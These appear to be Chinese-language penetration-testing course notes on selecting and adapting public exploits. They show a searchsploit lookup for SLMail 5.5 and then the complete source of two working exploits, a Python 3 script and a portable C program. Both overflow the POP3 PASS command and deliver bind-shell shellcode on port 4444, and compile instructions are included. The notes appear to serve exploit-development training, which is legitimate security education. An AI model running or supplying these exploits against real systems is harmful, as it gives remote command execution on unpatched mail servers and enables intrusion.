选择和修改EXP
互联网上公开的EXP代码
选择可信赖的EXP源
Exploit-db
SecurityFocus
Searchsploit
有能力修改EXP(Python、Perl、Ruby、C、C++...)
www.securityfocus.com
选择和修改EXP
646.c
类Unix环境下编译（例如下面的 646.c 引用了 winsock2.h/windows.h，在 Kali 上无法直接用 gcc 编译，需要移植到 POSIX socket 或用 MinGW 交叉编译）
返回地址与我们的环境不符
反弹shell硬编码了回链IP地址
缓冲区偏移量与我们的环境不符
目标IP硬编码
root@kali:~# searchsploit slmail
--------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
--------------------------------------------- ----------------------------------
SLMail 5.5 - POP3 PASS Buffer Overflow Explo | ./windows/remote/638.py
SLMail 5.5 - POP3 PASS Remote Buffer Overflo | ./windows/remote/643.c
SLMail 5.5 - Remote Buffer Overflow Exploit | ./windows/remote/646.c
SLMail Pro 6.3.1.0 - Multiple Remote Denial | ./windows/
--------------------------------------------- ----------------------------------
root@kali:~# cp /usr/share/exploitdb/platforms/windows/remote/638.py .
root@kali:~# cp /usr/share/exploitdb/platforms/windows/remote/643.c .
root@kali:~# cp /usr/share/exploitdb/platforms/windows/remote/646.c .
root@kali:~# ls
638.py 643.c 646.c 公共 模板 视频 图片 文档 下载 音乐 桌面
╭────────────────────────────────────────────╮
[638.py]
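#!/usr/bin/env python3
r"""
SLmail 5.5 POP3 PASS Buffer Overflow
Discovered by : Muts
Coded by : Muts
www.offsec

Plain vanilla stack overflow in the PASS command.

Original session (target: Windows 2000 SP4, unpatched):

    D:\Projects\BO> SLmail-5.5-POP3-PASS.py
    D:\Projects\BO> nc -v 192.168.1.167 4444
    localhost.lan [192.168.1.167] 4444 (?) open
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.
    C:\Program Files\SLmail\System>

Ported from the original Python 2 listing to Python 3 (bytes everywhere);
the payload itself is byte-for-byte the published one.

Values that are specific to the original author's lab and normally have to
be changed before the exploit works anywhere else:
  * the victim address -- hard-coded as 192.168.1.167 in the original; it is
    now the first command-line argument and only defaults to that value
  * RET_ADDR -- "Change ret address if needed" (the value is for Win2k SP4)
  * OFFSET -- padding before the saved return address (4654 here)
The shellcode is a bind shell: after the PASS line is sent, connect to
TCP/4444 on the victim ("Done! Try connecting to port 4444 on victim
machine").

For Educational Purposes Only!
"""
import socket
import struct
import sys

TARGET = "192.168.1.167"    # victim address hard-coded in the original
POP3_PORT = 110
OFFSET = 4654               # filler bytes before the saved return address
RET_ADDR = 0x783d6ddf       # Tested on Win2k SP4 Unpatched; change if needed
NOP_SLED_LEN = 32

# Encoded bind shell (TCP/4444), 399 bytes, exactly as published.
SHELLCODE = (
    b"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
    b"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
    b"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
    b"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
    b"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
    b"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
    b"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
    b"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
    b"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
    b"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
    b"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
    b"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
    b"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
    b"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
    b"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
    b"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
    b"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
    b"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
    b"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
    b"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
    b"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
    b"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
    b"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
    b"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
    b"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
)


def build_payload(offset=OFFSET, ret_addr=RET_ADDR, shellcode=SHELLCODE):
    """Return the PASS argument: filler, return address, NOP sled, shellcode.

    offset:    number of 0x41 filler bytes before the saved return address
    ret_addr:  32-bit address written over the saved return address
               (packed little-endian, as the original struct.pack('<L'))
    shellcode: bytes placed after the 32-byte NOP sled
    Raises struct.error if ret_addr does not fit in 32 bits.
    """
    return (b"\x41" * offset
            + struct.pack("<L", ret_addr)
            + b"\x90" * NOP_SLED_LEN
            + shellcode)


def exploit(host, port=POP3_PORT, payload=None):
    """Log in with a dummy USER and send the overflowing PASS line.

    host/port: POP3 service to hit; payload defaults to build_payload().
    Raises OSError (ConnectionRefusedError, socket.timeout, ...) if the
    connection cannot be made or the USER exchange fails. A reset after
    the PASS has been sent is expected -- the service crashes into the
    shellcode -- and is deliberately not reported as an error, unlike the
    original, which hid every failure behind "Could not connect to POP3!".
    """
    if payload is None:
        payload = build_payload()
    with socket.create_connection((host, port), timeout=10) as s:
        s.recv(1024)                        # banner
        s.sendall(b"USER username\r\n")
        s.recv(1024)
        s.sendall(b"PASS " + payload + b"\r\n")
        try:
            s.recv(1024)                    # may never arrive: server dies here
        except OSError:
            pass


def main(argv):
    """Entry point: ``638.py [host [port]]``; host defaults to TARGET.

    Returns the process exit status (0 = payload sent, 1 = error).
    """
    host = argv[1] if len(argv) > 1 else TARGET
    port = POP3_PORT
    if len(argv) > 2:
        try:
            port = int(argv[2])
        except ValueError:
            print("bad port: %s" % argv[2])
            return 1
        if not 0 < port < 65536:
            print("bad port: %s" % argv[2])
            return 1

    print("\n\n###############################################")
    print("\nSLmail 5.5 POP3 PASS Buffer Overflow")
    print("\nFound & coded by muts [at] offsec")
    print("\nFor Educational Purposes Only!")
    print("\n\n###############################################")
    print("\nSending ")
    try:
        exploit(host, port)
    except OSError as exc:
        print("Could not connect to POP3! (%s:%d: %s)" % (host, port, exc))
        return 1
    print("\nDone! Try connecting to port 4444 on victim machine.")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
# milw0rm [2004-11-18]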
╰────────────────────────────────────────────╯
╭────────────────────────────────────────────╮
[646.c]
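/*
 * SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov Иван-дурак
 * недействительный 31337 Team
 *
 * SLMail 5.5 POP3 "PASS" stack buffer overflow.  The PASS argument is
 * EVIL_LEN (3000) bytes of 0x43 filler; the saved return address at
 * RET_OFFSET is replaced by the address of a JMP ESP gadget.  ESP then
 * points just past the overwritten return address: four filler bytes
 * (0x43 = inc ebx, harmless), the 16-byte NOP sled at SLED_OFFSET and the
 * bind shell right after it.  The shell listens on TCP/4444 on the victim.
 *
 * Target-specific values that usually need adjusting (see the notes on
 * this page): the return address, RET_OFFSET and the POP3 port.  The
 * original listing writes 0x7CB41010 but its own comment quotes
 * "7CB41020 FFE4 JMP ESP" -- one of the two is a typo; verify the gadget
 * address in a debugger on your target before use.  Port and return
 * address can be given on the command line so the source need not be
 * edited:   646 <host> [port] [ret_addr_hex]
 *
 * The original is Winsock-only.  This version also builds on Linux/BSD
 * (gcc 646.c -o 646) through the small shim below; on Windows use MSVC or
 * MinGW (i686-w64-mingw32-gcc 646.c -o 646.exe -lws2_32).
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#include <windows.h>
#else
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
typedef int SOCKET;
#define INVALID_SOCKET (-1)
#define SOCKET_ERROR   (-1)
#define closesocket    close
#endif

enum {
    EVIL_LEN     = 3000,   /* filler bytes sent as the PASS argument          */
    RET_OFFSET   = 2600,   /* saved return address inside the filler          */
    SLED_OFFSET  = 2608,   /* original: (int *)evil + 652  ->  byte 652 * 4   */
    SLED_LEN     = 16,
    SC_OFFSET    = SLED_OFFSET + SLED_LEN, /* original: + 4 ints = +16 bytes */
    DEFAULT_PORT = 110,
    RECV_MAX     = 200     /* bytes read per server reply                     */
};

/* JMP ESP used by the original (see the header comment about 7CB41010 vs
 * 7CB41020).  Overridable from the command line. */
#define DEFAULT_RET_ADDR 0x7CB41010UL
static unsigned long g_ret_addr = DEFAULT_RET_ADDR;

/* [*] bind 4444 -- 317 bytes, contains no NUL (it travels inside a C string) */
static const unsigned char shellcode[] =
    "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
    "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
    "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
    "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
    "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
    "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
    "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
    "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
    "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
    "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
    "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
    "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
    "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
    "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
    "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
    "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
    "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
    "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
    "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
    "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";
#define SHELLCODE_LEN (sizeof shellcode - 1)   /* drop the string terminator */

static const unsigned char nopsled[SLED_LEN] = {
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90
};

/* Initialise the socket layer: Winsock needs WSAStartup, POSIX does not.
 * Returns 0 on success, -1 on failure. */
static int net_init(void)
{
#ifdef _WIN32
    WSADATA wsa;
    return WSAStartup(MAKEWORD(2, 0), &wsa) == 0 ? 0 : -1;
#else
    return 0;
#endif
}

/* Counterpart of net_init(); the original never called WSACleanup. */
static void net_fini(void)
{
#ifdef _WIN32
    WSACleanup();
#endif
}

/* Fill evil (EVIL_LEN + 1 bytes) with the PASS argument: 0x43 filler, the
 * return address at RET_OFFSET (little-endian, written byte-wise -- the
 * original stored it through an int*/long* alias of the char array), the
 * NOP sled at SLED_OFFSET and the shellcode at SC_OFFSET.  evil is
 * NUL-terminated at EVIL_LEN.  Returns EVIL_LEN. */
static size_t build_evil(char *evil, unsigned long ret_addr)
{
    memset(evil, 0x43, EVIL_LEN);
    evil[EVIL_LEN] = '\0';
    memcpy(evil + SLED_OFFSET, nopsled, SLED_LEN);
    memcpy(evil + SC_OFFSET, shellcode, SHELLCODE_LEN);
    evil[RET_OFFSET]     = (char)(ret_addr & 0xff);
    evil[RET_OFFSET + 1] = (char)((ret_addr >> 8) & 0xff);
    evil[RET_OFFSET + 2] = (char)((ret_addr >> 16) & 0xff);
    evil[RET_OFFSET + 3] = (char)((ret_addr >> 24) & 0xff);
    return EVIL_LEN;
}

/* Read one server reply (at most RECV_MAX bytes), NUL-terminate it and
 * echo it.  The original printed the buffer with %s without terminating it,
 * so printf could run past the received bytes into uninitialised stack.
 * Returns the byte count, or -1 if the peer closed or recv() failed. */
static int read_reply(int sock)
{
    char receive[RECV_MAX + 1];
    int n = (int)recv(sock, receive, RECV_MAX, 0);

    if (n <= 0) {
        printf("[-] recv() failed or connection closed\n");
        return -1;
    }
    receive[n] = '\0';
    printf("[+] %s", receive);
    return n;
}

/* Parse s as an unsigned number in base, rejecting an empty string, a
 * leading '-', trailing junk, overflow and values above max.
 * Returns 0 and stores the value in *out, or -1. */
static int parse_ulong(const char *s, int base, unsigned long max,
                       unsigned long *out)
{
    char *end;
    unsigned long v;

    if (s[0] == '\0' || s[0] == '-')
        return -1;
    errno = 0;
    v = strtoul(s, &end, base);
    if (*end != '\0' || errno == ERANGE || v > max)
        return -1;
    *out = v;
    return 0;
}

/* Talk POP3 on a connected socket and deliver the overflow: read the
 * banner, send USER, read its reply, send the oversized PASS built with
 * g_ret_addr.  Returns 0 once the PASS line is on the wire, -1 on a socket
 * error before that (no exit(), so the caller can still clean up). */
int exploit(int sock)
{
    static const char userbuf[] = "USER madivan\r\n";
    char evil[EVIL_LEN + 1];
    /* "PASS " + filler + CRLF + NUL.  Assembled with explicit lengths rather
     * than sprintf("%s") so a stray NUL in the payload could not silently
     * truncate what is sent. */
    char buf[5 + EVIL_LEN + 2 + 1];
    size_t len = 0;

    build_evil(evil, g_ret_addr);
    memcpy(buf + len, "PASS ", 5);      len += 5;
    memcpy(buf + len, evil, EVIL_LEN);  len += EVIL_LEN;
    memcpy(buf + len, "\r\n", 2);       len += 2;
    buf[len] = '\0';

    /* banner */
    if (read_reply(sock) < 0)
        return -1;

    /* user */
    printf("[+] \n");
    if (send(sock, userbuf, (int)strlen(userbuf), 0) == SOCKET_ERROR) {
        printf("[-] send(USER) failed\n");
        return -1;
    }
    if (read_reply(sock) < 0)
        return -1;

    /* passwd */
    printf("[+] Sending \n");
    if (send(sock, buf, (int)len, 0) == SOCKET_ERROR) {
        printf("[-] send(PASS) failed\n");
        return -1;
    }
    printf("[*] Done! Connect to the host on port 4444\n\n");
    return 0;
}

/* Resolve host and open a TCP connection to port.  Returns the connected
 * socket, or -1 after printing the reason.  (The original called exit(0)
 * here, reporting failure with a success status and skipping cleanup.) */
int connect_target(const char *host, unsigned short port)
{
    struct hostent *hp;
    struct sockaddr_in sa;
    SOCKET s;

    hp = gethostbyname(host);
    if (hp == NULL || hp->h_addrtype != AF_INET || hp->h_addr_list[0] == NULL) {
        printf("gethostbyname() error!\n");
        return -1;
    }
    printf("[+] Connecting to %s\n", host);

    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    memcpy(&sa.sin_addr, hp->h_addr_list[0], sizeof sa.sin_addr);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == INVALID_SOCKET) {
        printf("[-] socket blah?\n");
        return -1;
    }
    if (connect(s, (struct sockaddr *)&sa, sizeof sa) == SOCKET_ERROR) {
        printf("[-] connect() blah!\n");
        closesocket(s);
        return -1;
    }
    printf("[+] Connected to %s\n", host);
    return (int)s;
}

/* usage: 646 <host> [port] [ret_addr_hex]
 * Exit status is 0 only when the payload was sent; 1 otherwise. */
int main(int argc, char **argv)
{
    int sock;
    int rc = 1;
    unsigned short port = DEFAULT_PORT;

    printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n");
    printf("[$] by Mad Ivan [ void31337 team ] - \n\n");
    if (argc < 2) {
        printf("usage: %s <host> [port] [ret_addr_hex]\n\n", argv[0]);
        return 1;
    }
    if (argc > 2) {
        unsigned long v;
        if (parse_ulong(argv[2], 10, 65535, &v) < 0 || v == 0) {
            printf("[-] bad port: %s\n", argv[2]);
            return 1;
        }
        port = (unsigned short)v;
    }
    if (argc > 3) {
        unsigned long v;
        if (parse_ulong(argv[3], 16, 0xffffffffUL, &v) < 0) {
            printf("[-] bad return address: %s\n", argv[3]);
            return 1;
        }
        g_ret_addr = v;
    }

    if (net_init() < 0) {
        printf("[-] socket layer initialisation failed\n");
        return 1;
    }
    sock = connect_target(argv[1], port);
    if (sock >= 0) {
        rc = exploit(sock) == 0 ? 0 : 1;
        closesocket(sock);
    }
    net_fini();
    return rc;
}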
╰────────────────────────────────────────────╯
root@kali:~# gedit 638.py
root@kali:~# gedit 646.c
root@kali:~# gcc 646.c -o 646    # 注意是 -o（输出文件）而不是 -0；646.c 原版引用 winsock2.h/windows.h，在 Kali 上需先移植为 POSIX socket，或用 MinGW 交叉编译：i686-w64-mingw32-gcc 646.c -o 646.exe -lws2_32
选择和修改EXP
646.c